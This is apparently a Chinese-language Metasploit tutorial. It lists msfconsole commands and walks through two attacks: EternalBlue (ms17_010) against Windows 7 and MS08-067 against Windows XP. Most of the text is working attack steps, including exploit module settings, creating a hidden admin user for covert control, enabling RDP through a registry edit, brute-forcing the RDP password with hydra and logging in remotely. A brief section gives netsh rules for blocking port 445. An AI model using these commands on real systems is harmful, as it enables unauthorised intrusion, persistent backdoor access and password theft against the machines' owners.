一些常用指令
msfconsole 打開控制檯終端
msfupdate 更新
help [command] e.g. help search 命令使用幫助信息
search […] e.g. search portscan
use … 選擇滲透攻擊模塊
show payloads 查看與該攻擊模塊相兼容的攻擊載荷
set payload … 設置攻擊載荷
set target 設置目標
show options 查看需要設置的配置參數
exploit 實施滲透攻擊
metasploit滲透攻擊模塊在目錄/usr/share/metasploit-framework/modules/exploits
nmap <掃描選項><掃描目標>
攻擊實例
1、利用永恆之藍(ms17_010)漏洞攻擊win7
- 打開metasploit
msfconsole - 使用永恆之藍模塊
search ms17-01
use exploit/windows/smb/ms17_010_eternalblue - 填充各種指令,主要是靶機IP,其中445端口已經默認了,其他不用改
show options
set RHOST 192.168.12.1 - 攻擊
exploit或者run - 創建新用戶,偷偷的控制使用
net user admin 123456 /add - 提權,將新創建的用戶admin提到管理員權限
net localgroup administrators admin /add
查看權限:
net user admin
防禦辦法:
1,網上下載補丁,
2,關閉445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
檢測445端口是否開啓:
netstat -ano -p tcp | find “445”
2、利用Windows Server服務RPC請求緩衝區溢出漏洞(ms_08067)入侵WinXP
- 在msfconsole使用search命令搜索MS08067漏洞攻擊程序
- 使用use命令調用MS08067漏洞攻擊程序
use exploit/windows/smb/ms08_067_netapi - 使用show options 命令查看需要設置的選項
可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)
使用 set 命令設置 Module Options,此處需要設置目標IP - 接着設置Exploit target,使用show targets 查看可選項
可以看出哪些版本的系統存在此漏洞,攻擊的XP系統爲WinXP SP3 簡體中文版,即使用set target 命令設置目標,此處即爲set target 34 - 此時再用show options 可以看到全部設置完成,接着使用exploit 或者 run 進行攻擊,執行exploit命令後得到一個meterpreter
- 在meterpreter中輸入shell即可進入CMD窗口
- 可以進行一些攻擊,如遠程桌面控制:
—-打開RDP服務
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
—-使用netstat -an命令查看端口是否開放
—-接着使用net user命令查看XP系統中的用戶
net user
—-然後針對指定用戶比如sysorem用戶進行登錄密碼爆破
hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
—-使用hydra爆破密碼得:12345接着就能直接登錄XP進行遠程控制
rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
—-完成遠程控制